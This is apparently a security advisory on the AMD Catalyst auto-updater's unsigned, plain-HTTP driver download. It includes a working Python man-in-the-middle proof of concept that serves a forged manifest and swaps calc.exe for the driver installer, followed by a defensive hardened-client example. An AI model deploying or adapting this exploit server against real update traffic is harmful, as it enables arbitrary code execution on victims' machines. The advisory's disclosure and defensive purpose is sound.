On 17 January 2013 AMD released Catalyst 13.1 and shortly afterwards announced that it was removing the automatic update feature, saying at the time that the auto-updater had a security problem. Details of that problem have now surfaced: the update request can be hijacked with a man-in-the-middle attack.
The vulnerability exists because:
the driver binary is downloaded over plain HTTP, and AMD's updater does not verify a signature on it before executing it.
This means an attacker in a man-in-the-middle position can intercept the request to AMD's support site and redirect it to a page or program of the attacker's choosing.
PoC (Python 2; assumes the victim's traffic to the update host has already been redirected to this machine):

import SimpleHTTPServer
import SocketServer

# Forged catalystxml manifest. It points the updater at an .exe URL; because the
# client fetches over HTTP and never checks a signature, the MITM host answers for it.
xml = """<?xml version="1.0" encoding="utf-8"?>
<list>
<Catalyst-Driver-Files>
<Title>Catalyst Software Suite with .NET 4 Support</Title>
<DriverCategory>Full Catalyst Software Suite (Recommended)</DriverCategory>
<DriverLanguage>;#All;#</DriverLanguage>
<DriverProductType>;#1-Radeon;#3-Integrated;#18-AIW_HD;#</DriverProductType>
<FileSize>184 MB</FileSize>
<OSType>;#Windows Vista - 64-Bit Edition;#Windows 7 - 64-Bit Edition;#</OSType>
<ReleaseDate>2012-10-22T00:00:00-05:00</ReleaseDate>
<RevisionNumber>12.42</RevisionNumber>
<RollupSortOrder>15</RollupSortOrder>
<TextMultiple1> </TextMultiple1>
<TextSingle1>http://www2.ati.com/drivers/12-10_vista_win7_win8_64_dd_ccc_whql_net4.exe</TextSingle1>
<TechDownloadGPUSubtype>Driver</TechDownloadGPUSubtype>
<ContentType>GraphicsDriverFile</ContentType>
<DriverVersionSupported>;#12.42;#</DriverVersionSupported>
<ID>956</ID>
<Modified>2012-10-22T21:30:52-05:00</Modified>
<Created>2012-10-22T21:30:52-05:00</Created>
<Author>System Account</Author>
<Editor>System Account</Editor>
<_UIVersionString>1.0</_UIVersionString>
<Attachments>0</Attachments>
<TitleCN>Catalyst Software Suite</TitleCN>
<TitleBR>Catalyst Software Suite</TitleBR>
<TitleDE>Catalyst Software Suite</TitleDE>
<TitleFR>Catalyst Software Suite</TitleFR>
<TitleIT>Catalyst Software Suite</TitleIT>
<TitleLA>Catalyst Software Suite</TitleLA>
<DescriptionCN> </DescriptionCN>
<DescriptionBR> </DescriptionBR>
<DescriptionDE> </DescriptionDE>
<DescriptionFR> </DescriptionFR>
<DescriptionIT> </DescriptionIT>
<DescriptionLA> </DescriptionLA>
<TitleKR>(Catalyst Software Suite)</TitleKR>
<DescriptionKR> </DescriptionKR>
<LinkTitleNoMenu>Catalyst Software Suite with .NET 4 Support</LinkTitleNoMenu>
<LinkTitle>Catalyst Software Suite with .NET 4 Support</LinkTitle>
</Catalyst-Driver-Files>
</list>
"""

class ExploitHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
    def do_GET(self):
        if "catalystxml" in self.path:
            # Serve the forged manifest in place of AMD's.
            self.send_response(200)
            self.send_header('Content-type', 'text/xml')
            self.end_headers()
            self.wfile.write(xml)
            return
        elif ".exe" in self.path:
            # Serve calc.exe in place of the driver installer; the updater runs it unverified.
            self.send_response(200)
            self.send_header('Content-type', 'application/octet-stream')
            self.end_headers()
            f = open(r"C:\Windows\System32\calc.exe", "rb")
            self.wfile.write(f.read())
            f.close()
            return

httpd = SocketServer.ThreadingTCPServer(('0.0.0.0', 80), ExploitHandler)
httpd.serve_forever()
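The PoC works because the client trusts whatever the manifest says and runs whatever comes back. The following is an added example (Python 3, not AMD's code and not part of the original post) of the checks a hardened update client would apply to the same catalystxml-style manifest: refuse non-HTTPS download URLs, refuse hosts outside an allow-list, require a digest for the binary, and compare the fetched bytes against that digest before execution. The `TRUSTED_HOSTS` allow-list and the `<Sha256>` manifest element are assumptions made for the example; the real manifest in the PoC carries no digest. A digest in the manifest only helps when the manifest itself arrives over an authenticated channel, so the manifest fetch would need the same HTTPS treatment; on Windows the stronger fix is to verify the installer's Authenticode signature, which this stdlib-only example does not implement.

```python
import hashlib
import hmac
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

# Hosts the updater is allowed to download drivers from. This allow-list is an
# assumption for the example, not AMD's real configuration.
TRUSTED_HOSTS = {"www2.ati.com", "support.amd.com"}


class UpdateRejected(Exception):
    """Raised when a manifest entry fails the hardened checks."""


def parse_manifest(xml_text):
    """Return (download_url, sha256_hex_or_None) from a catalystxml-style manifest.

    <Sha256> is a hypothetical element added for this example; the real manifest
    shown in the PoC carries no digest at all."""
    root = ET.fromstring(xml_text)
    entry = root.find("Catalyst-Driver-Files")
    if entry is None:
        raise UpdateRejected("manifest has no driver entry")
    url = (entry.findtext("TextSingle1") or "").strip()
    digest = (entry.findtext("Sha256") or "").strip().lower() or None
    return url, digest


def vulnerable_select(xml_text):
    """Mirrors the original client: trust whatever URL the manifest names."""
    url, _ = parse_manifest(xml_text)
    return url


def hardened_select(xml_text):
    """Accept the entry only if the download is https to a trusted host and has a digest."""
    url, digest = parse_manifest(xml_text)
    parts = urlparse(url)
    if parts.scheme != "https":
        raise UpdateRejected("download URL must use https, got %r" % parts.scheme)
    if parts.hostname not in TRUSTED_HOSTS:
        raise UpdateRejected("untrusted download host %r" % parts.hostname)
    if digest is None or len(digest) != 64 or any(c not in "0123456789abcdef" for c in digest):
        raise UpdateRejected("manifest entry carries no usable SHA-256 digest")
    return url, digest


def verify_download(data, expected_sha256):
    """Constant-time comparison of the fetched bytes' SHA-256 with the manifest digest."""
    actual = hashlib.sha256(data).hexdigest()
    return hmac.compare_digest(actual, expected_sha256.lower())


# --- constructed sample inputs -------------------------------------------------
# Same shape as the PoC's forged manifest: plain http, no digest.
FORGED_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<list>
  <Catalyst-Driver-Files>
    <Title>Catalyst Software Suite with .NET 4 Support</Title>
    <TextSingle1>http://www2.ati.com/drivers/12-10_vista_win7_win8_64_dd_ccc_whql_net4.exe</TextSingle1>
  </Catalyst-Driver-Files>
</list>
"""

# Stand-in for a driver installer (constructed bytes, not a real binary).
GOOD_PAYLOAD = b"MZ\x90\x00 constructed stand-in for a driver installer"
GOOD_DIGEST = hashlib.sha256(GOOD_PAYLOAD).hexdigest()

# What a manifest would need to look like for the hardened client to accept it.
GOOD_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<list>
  <Catalyst-Driver-Files>
    <Title>Catalyst Software Suite with .NET 4 Support</Title>
    <TextSingle1>https://www2.ati.com/drivers/12-10_vista_win7_win8_64_dd_ccc_whql_net4.exe</TextSingle1>
    <Sha256>%s</Sha256>
  </Catalyst-Driver-Files>
</list>
""" % GOOD_DIGEST


def demo():
    """Run both clients against both manifests; returns a dict of outcomes."""
    results = {"vulnerable_accepts_forged": vulnerable_select(FORGED_MANIFEST)}
    try:
        hardened_select(FORGED_MANIFEST)
        results["hardened_rejects_forged"] = False
    except UpdateRejected as e:
        results["hardened_rejects_forged"] = str(e)
    url, digest = hardened_select(GOOD_MANIFEST)
    results["hardened_accepts_good"] = url
    results["good_payload_verifies"] = verify_download(GOOD_PAYLOAD, digest)
    # A swapped binary (the PoC's calc.exe) fails the digest check instead of running.
    results["swapped_payload_verifies"] = verify_download(b"calc.exe bytes", digest)
    return results


if __name__ == "__main__":
    for k, v in demo().items():
        print("%-28s %s" % (k, v))
```

Note that the forged manifest names the genuine www2.ati.com host, so a host allow-list on its own would pass it; the rejection comes from the plain-http scheme, which is exactly the channel the MITM controls. The digest check then catches the second half of the attack, a swapped binary at a URL that otherwise looks legitimate.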
Many other applications are likely to have the same weakness; the EvilGrade tool was developed to find and exploit insecure update mechanisms of this kind.
[Thanks to LinuxSpace for the submission]